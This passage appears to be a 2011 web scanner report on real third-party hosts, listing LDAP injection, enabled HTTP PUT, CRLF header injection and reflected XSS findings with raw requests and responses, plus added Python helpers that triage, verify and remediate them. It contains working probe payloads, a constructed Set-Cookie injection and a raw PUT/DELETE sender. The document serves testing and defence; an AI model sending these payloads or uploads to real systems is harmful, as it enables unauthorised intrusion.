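    for p in SCANNER_PAYLOADS:
        unsafe = build_filter_unsafe(p)
        print('unsafe :', unsafe, '->', assertion_count(unsafe), 'assertions')
        print('escaped:', build_filter_escaped(p))
        try:
            build_filter_safe(p)
        except ValueError as e:
            print('safe   :', e)
```

With the first payload the unsafe filter becomes `(&(uid=*)(sn=*)(objectClass=person))`, four assertions where the template had three, which is exactly the extra conjunct the issue detail describes; the escaped form keeps it at three. The second payload produces a filter the server cannot parse, which is why a vulnerable target answers the two requests differently.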

Request 1

GET /*)(sn=*/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:15 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

Request 2

GET /*)!(sn=*/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>
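The tentative findings 2.81 to 2.83 and the LDAP finding above share one defect: at least one of the two compared responses is a 503 "Server Too Busy" or a 417 "Rate limit exceeded" from the front end, so the "difference" never involved application code. The following added example (not part of the report) is a small triage helper that parses a pair of raw responses and discards a differential when either side came from the infrastructure layer. The sample pairs are abbreviated copies of the responses shown above; the "constructed" pair is made up to show what a genuine error-based differential looks like, and the status-code rule is a heuristic for this target, not a general truth.

```python
import re
from typing import NamedTuple, Dict

# Added example, not part of the scan report. The two sample pairs are
# abbreviated copies of the responses shown above for 2.81 and for the LDAP
# finding; the "constructed" pair further down is made up to show the
# positive case. The status-code rule is a heuristic for this target.


class Response(NamedTuple):
    status: int
    reason: str
    headers: Dict[str, str]
    body: str


def parse_response(raw: str) -> Response:
    """Split a raw HTTP/1.x response into status, reason, headers and body."""
    text = raw.replace('\r\n', '\n').lstrip('\n')
    head, _, body = text.partition('\n\n')
    lines = head.split('\n')
    m = re.match(r'HTTP/\d\.\d (\d{3}) ?(.*)$', lines[0])
    if not m:
        raise ValueError('not an HTTP status line: %r' % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return Response(int(m.group(1)), m.group(2), headers, body)


# Responses that a load balancer, cache or rate limiter produces without the
# application ever seeing the injected value.
INFRA_STATUS = {417, 429, 502, 503, 504}
INFRA_BODY_MARKERS = ('server too busy', 'rate limit exceeded')


def is_infrastructure_response(resp: Response) -> bool:
    if resp.status in INFRA_STATUS:
        return True
    body = resp.body.lower()
    return any(marker in body for marker in INFRA_BODY_MARKERS)


def triage(raw_single_quote: str, raw_double_quote: str) -> str:
    """'discard' when either response never reached application code,
    'review' when both did and they genuinely differ, else 'no-diff'."""
    a, b = parse_response(raw_single_quote), parse_response(raw_double_quote)
    if is_infrastructure_response(a) or is_infrastructure_response(b):
        return 'discard'
    if (a.status, a.body) == (b.status, b.body):
        return 'no-diff'
    return 'review'


# Abbreviated from the report (2.81): ' gave a 503, '' gave a 404.
SQLI_R1 = ('HTTP/1.0 503 Server Too Busy\nContent-Length: 25\n'
           'Content-Type: text/html\n\n<h2>Server Too Busy</h2>\n')
SQLI_R2 = ('HTTP/1.1 404 Not Found\nServer: WWW\nContent-Type: text/html\n'
           'Date: Sat, 14 May 2011 22:44:19 GMT\n\n'
           '<html><head><title>Element not valid</title></head></html>\n')
# Abbreviated from the report (3): the two LDAP payloads got 417 and 503.
LDAP_R1 = ('HTTP/1.1 417 Rate limit exceeded\nContent-Type: text/html\n'
           'Content-Length: 40\n\n417 Rate limit exceeded for engine pages\n')
LDAP_R2 = SQLI_R1
# Constructed, not from the report: what a real error-based differential looks like.
APP_ERR = ('HTTP/1.1 500 Internal Server Error\nContent-Type: text/html\n\n'
           'You have an error in your SQL syntax near \'\'\' at line 1\n')
APP_OK = 'HTTP/1.1 200 OK\nContent-Type: text/html\n\n<html>profile page</html>\n'

if __name__ == '__main__':
    print('2.81 :', triage(SQLI_R1, SQLI_R2))   # discard
    print('LDAP :', triage(LDAP_R1, LDAP_R2))   # discard
    print('ctor :', triage(APP_ERR, APP_OK))    # review
```

A finding that survives this filter still needs the manual work the scanner asks for (reading the actual error text and checking other inputs); the helper only removes the pairs that could not have been evidence in the first place.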

4. HTTP PUT enabled

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /UploadedImages/200X150_20.swf

Issue detail

HTTP PUT is enabled on the web server. The file /7bf7e2c3c8f3707.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.

Request 1

PUT /7bf7e2c3c8f3707.txt HTTP/1.0
Host: documents.policybazaar.com
Content-Length: 16

b1727cb94fe741b4

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 14 May 2011 13:52:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://documents.policybazaar.com/7bf7e2c3c8f3707.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /7bf7e2c3c8f3707.txt HTTP/1.0
Host: documents.policybazaar.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 14 May 2011 13:52:12 GMT
Accept-Ranges: bytes
ETag: W/"4c6079203e12cc1:4c50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 13:52:12 GMT
Connection: close

b1727cb94fe741b4
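The Allow header in the 201 response above advertises not only PUT but the WebDAV write methods (DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK), and the finding is confirmed by the GET returning the exact bytes that were PUT. The following added example (not code from the report) reads that header, checks the PUT-then-GET evidence chain, and builds the three raw requests a tester would send, including the DELETE that removes the test file afterwards. Nothing touches the network unless `send_raw()` is called deliberately against a host you are authorised to test.

```python
import socket

# Added example, not part of the scan report. It reads the Allow header the
# server returned above, checks the PUT -> GET evidence chain, and builds the
# raw requests (including the DELETE that cleans the test file up). Nothing
# runs against the network unless send_raw() is called explicitly.

# Methods that let a client change server state; WebDAV ones included because
# the Allow header above advertises them.
WRITE_METHODS = {'PUT', 'DELETE', 'COPY', 'MOVE', 'MKCOL', 'PROPPATCH', 'LOCK', 'UNLOCK'}


def parse_allow(header_value: str) -> set:
    return {m.strip().upper() for m in header_value.split(',') if m.strip()}


def risky_methods(header_value: str) -> list:
    """Sorted list of state-changing methods the server advertises."""
    return sorted(parse_allow(header_value) & WRITE_METHODS)


def confirms_upload(put_status: int, put_body: str, get_status: int, get_body: str) -> bool:
    """True only when PUT was accepted and GET returned exactly what was put:
    a 201 alone is not proof, some servers answer 201 and discard the body."""
    return (put_status in (200, 201, 204) and get_status == 200
            and get_body.strip() == put_body.strip())


def verification_requests(host: str, path: str, marker: str) -> list:
    """Raw HTTP/1.0 requests for the PUT, the confirming GET and the cleanup DELETE."""
    body = marker.encode('ascii')
    put = (b'PUT %s HTTP/1.0\r\nHost: %s\r\nContent-Length: %d\r\n\r\n'
           % (path.encode(), host.encode(), len(body))) + body
    get = b'GET %s HTTP/1.0\r\nHost: %s\r\n\r\n' % (path.encode(), host.encode())
    delete = b'DELETE %s HTTP/1.0\r\nHost: %s\r\n\r\n' % (path.encode(), host.encode())
    return [put, get, delete]


def send_raw(host: str, request: bytes, port: int = 80, timeout: float = 10.0) -> bytes:
    """Send one raw request and return the whole response (authorised testing only)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                return b''.join(chunks)
            chunks.append(data)


# Header value copied from the 201 response above.
REPORT_ALLOW = ('OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, '
                'PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK')

if __name__ == '__main__':
    print('state-changing methods advertised:', risky_methods(REPORT_ALLOW))
    print('upload confirmed:',
          confirms_upload(201, 'b1727cb94fe741b4', 200, 'b1727cb94fe741b4\n'))
    for req in verification_requests('documents.policybazaar.com',
                                     '/7bf7e2c3c8f3707.txt', 'b1727cb94fe741b4'):
        print(req.split(b'\r\n', 1)[0].decode())
```

Use a random marker and a random file name, as the scanner did, so that a later GET cannot be satisfied by a pre-existing file, and always send the DELETE: a test file left on a public document host is itself a finding the next scanner will report.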

5. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
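The two instances below both follow the same shape: a request value is URL-decoded by the server, so `%0d%0a` becomes a real CRLF, and then concatenated into a response header (Location in 5.1, Set-Cookie in 5.2). The following added example (not code from the report or from either ad server) shows that unsafe concatenation beside a version that applies the remediation above, rejecting every character below 0x20 and percent-encoding the rest. The redirect handler and its target host are assumed; the first payload is the one the scanner sent in 5.1, the second is constructed here to show a new header being injected rather than only a split.

```python
from urllib.parse import quote, unquote

# Added example, not part of the scan report. The handler shape (a redirect
# whose target is built from a query value) is assumed; the first payload is
# the one the scanner sent to ad.doubleclick.net in 5.1, the second is
# constructed here to show a header being injected rather than just split.


def redirect_unsafe(src: str) -> bytes:
    """What the vulnerable endpoint effectively does: the (already URL-decoded)
    request value is concatenated into the Location header."""
    return (b'HTTP/1.1 302 Moved Temporarily\r\n'
            b'Location: http://metrics.example/collect?src=' + src.encode('latin-1') +
            b'\r\nContent-Length: 0\r\n\r\n')


def header_value(value: str) -> str:
    """Remediation from the report: refuse any character below 0x20 (CR, LF,
    NUL, ...) and DEL, then percent-encode so the value stays one header line."""
    if any(ord(c) < 0x20 or ord(c) == 0x7f for c in value):
        raise ValueError('control character in header value')
    return quote(value, safe='')


def redirect_safe(src: str) -> bytes:
    return (b'HTTP/1.1 302 Moved Temporarily\r\n'
            b'Location: http://metrics.example/collect?src=' + header_value(src).encode('ascii') +
            b'\r\nContent-Length: 0\r\n\r\n')


def header_names(raw: bytes) -> list:
    """Header names as a proxy or browser would parse them from the raw bytes;
    an injected line shows up here as a new name."""
    head = raw.split(b'\r\n\r\n', 1)[0]
    return [line.split(b':', 1)[0].decode('latin-1') for line in head.split(b'\r\n')[1:]]


REPORT_PAYLOAD = unquote('e26a4%0d%0a4ab8ada7f2f')                  # from 5.1
INJECT_COOKIE = unquote('x%0d%0aSet-Cookie:%20session%3Dattacker')  # constructed

if __name__ == '__main__':
    print(header_names(redirect_unsafe(REPORT_PAYLOAD)))  # ['Location', '4ab8ada7f2f', 'Content-Length']
    print(header_names(redirect_unsafe(INJECT_COOKIE)))   # ['Location', 'Set-Cookie', 'Content-Length']
    try:
        redirect_safe(REPORT_PAYLOAD)
    except ValueError as e:
        print('rejected:', e)
    print(header_names(redirect_safe('e26a4')))           # ['Location', 'Content-Length']
```

Rejecting rather than stripping the control characters matters: a filter that removes `\r\n` but not `\r` alone, or that runs before a second URL-decode, reopens the split. Modern server frameworks refuse header values containing CR or LF at the framework boundary for the same reason; the ad servers above evidently did not.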


5.1. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload e26a4%0d%0a4ab8ada7f2f was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1516044;host=metrics.blackberry.com%2Fb%2Fss%2Frimglobal%2Crimbbus%2F1%2FH.22.1%2Fs86852463499098%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26E74833851D2212-6000010680032FA8%26%26ndh%3D1%26t%3D14%252F4%252F2011%25209%253A23%253A34%25206%2520300%26ns%3Dresearchinmotion%26pageName%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26g%3Dhttp%253A%252F%252Fus.blackberry.com%252Fapps-software%252Fappworld%252F%26vvp%3DDFA%25231516044%253Av32%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dus%253Abb%253Aservices%26events%3Devent8%252Cevent26%252Cevent27%26c1%3Dus%253Abb%253Aservices%253Aappworld%26h1%3Dus%252Cbb%252Cservices%252Cappworld%26v9%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26v10%3Dus%253Abb%253Aservices%26v11%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26v23%3Dus%253Abb%253Aservices%253Aappworld%26c40%3Dhttp%253A%252F%252Fus.blackberry.com%252Fapps-software%252Fappworld%252F%26s%3D1920x1200%26c%3D24%26j%3D1.7%26v%3DY%26k%3DY%26bw%3D1138%26bh%3D941%26p%3DJava%2520Deployment%2520Toolkit%25206.0.240.7%253BGoogle%2520Update%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BWPI%2520Detector%25201.3%253B%26AQE%3D1e26a4%0d%0a4ab8ada7f2f&A2S=1;ord=1171295170 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/apps-software/appworld/
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s86852463499098?AQB=1&vvpr=true&&pccr=true&vidn=26E74833851D2212-6000010680032FA8&&ndh=1&t=14%2F4%2F2011%209%3A23%3A34%206%20300&ns=researchinmotion&pageName=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&g=http%3A%2F%2Fus.blackberry.com%2Fapps-software%2Fappworld%2F&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Aservices&events=event8%2Cevent26%2Cevent27&c1=us%3Abb%3Aservices%3Aappworld&h1=us%2Cbb%2Cservices%2Cappworld&v9=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&v10=us%3Abb%3Aservices&v11=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&v23=us%3Abb%3Aservices%3Aappworld&c40=http%3A%2F%2Fus.blackberry.com%2Fapps-software%2Fappworld%2F&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1138&bh=941&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1e26a4
4ab8ada7f2f
&A2S=1/respcamphist;src=1516044;ec=nc;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1305383042:
Date: Sat, 14 May 2011 14:24:02 GMT
Server: GFE/2.0
Content-Type: text/html


5.2. http://c7.zedo.com/img/bh.gif [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The value of the a request parameter is copied into the Set-Cookie response header. The payload 2704a%0d%0a77410563eb8 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /img/bh.gif?n=305&g=20&a=2704a%0d%0a77410563eb8&s=1&t=i&cb=782c3a04-0a73-4bac-9a23-840a51099312 HTTP/1.1
Host: c7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: FFgeo=2241452; FFChanCap=1583B1190,1#675962#675816#812963#816392#675179,2#894866|0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDX=21; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660:1432,193317|0,1,1:0,1,1:0,8,1; FFcat=1380,6,17:1380,6,5:1380,6,0; FFad=0:0:1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=864B305,20|145_1#365Z2704a
77410563eb8
_1#365;expires=Sun, 13 May 2012 14: 21:38 GMT;domain=.zedo.com;path=/;
ETag: "61ca4793-7054-49420a02cd680"
X-Varnish: 155311604
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=58315
Expires: Sun, 15 May 2011 06:33:33 GMT
Date: Sat, 14 May 2011 14:21:38 GMT
Connection: close

GIF89a.............!.......,...........D..;


6. Cross-site scripting (reflected)
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and input which fails validation should be rejected rather than sanitised; and user input should be HTML-encoded at any point where it is copied into application responses, replacing all HTML metacharacters (including < > " ' and =) with the corresponding HTML entities. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89764"-alert(1)-"10cad9e4e1e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
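The payload `89764"-alert(1)-"10cad9e4e1e` works because, once reflected, the statement reads `"89764"-alert(1)-"10cad9e4e1e"`: a string minus a function call minus a string is a valid JavaScript expression, so the script parses and `alert(1)` runs. HTML-encoding does not help inside a script block, which is why the remediation detail says to avoid the context altogether. The following added example (not code from the report or from the ad server) shows the raw reflection beside the encoding to use when the context cannot be avoided, and a small tokenizer check that tells whether the reflected value is still inside the template's string. The template and its variable name are assumed; only the fact that the value lands inside a double-quoted JavaScript string is taken from the response below. 6.2 to 6.4 are the same context with other parameters.

```python
import json

# Added example, not part of the scan report. The template below stands in
# for the ad server's script (only the fact that the value lands inside a
# double-quoted JavaScript string is taken from the response); the variable
# name is assumed. The payload is the one from 6.1.

TEMPLATE = 'var clickTag = "%s";\n'
REPORT_PAYLOAD = '89764"-alert(1)-"10cad9e4e1e'


def render_unsafe(value: str) -> str:
    """Raw reflection into a script block, as in the finding."""
    return TEMPLATE % value


def js_string_literal(value: str) -> str:
    """Encode for a double-quoted JS string context. json.dumps escapes quotes,
    backslashes, control characters and (with ensure_ascii) U+2028/2029; the
    extra replacements stop the value from closing the enclosing <script>."""
    inner = json.dumps(value)[1:-1]   # drop json's own surrounding quotes
    return inner.replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026')


def render_safe(value: str) -> str:
    return TEMPLATE % js_string_literal(value)


def closing_quote_index(js: str, opening: int) -> int:
    """Index of the quote that ends the literal opened at js[opening],
    honouring backslash escapes the way a JS tokenizer does."""
    i = opening + 1
    while i < len(js):
        if js[i] == '\\':
            i += 2
            continue
        if js[i] == '"':
            return i
        i += 1
    raise ValueError('unterminated string literal')


def literal_intact(rendered: str) -> bool:
    """True when the reflected value is still inside the template's string,
    i.e. the first literal ends at the template's own closing quote."""
    opening = rendered.index('"')
    end = closing_quote_index(rendered, opening)
    return rendered[end:end + 2] == '";'


if __name__ == '__main__':
    for label, render in (('unsafe', render_unsafe), ('safe', render_safe)):
        out = render(REPORT_PAYLOAD)
        print('%-6s %s  intact=%s' % (label, out.strip(), literal_intact(out)))
```

Where the page design allows it, the better fix is to keep the value out of the script entirely: emit it HTML-encoded in a `data-` attribute and read it from the DOM, so there is only one encoding context to get right.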

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=89764"-alert(1)-"10cad9e4e1e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4808
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 18:40:18 GMT
Expires: Sat, 14 May 2011 18:40:18 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
L2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=89764"-alert(1)-"10cad9e4e1ehttps://www.lowermybills.com/lending/home-refinance/?sourceid=55400189-240104510-41904509");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb9d"-alert(1)-"e1a6f9d16c7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA7eb9d"-alert(1)-"e1a6f9d16c7&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
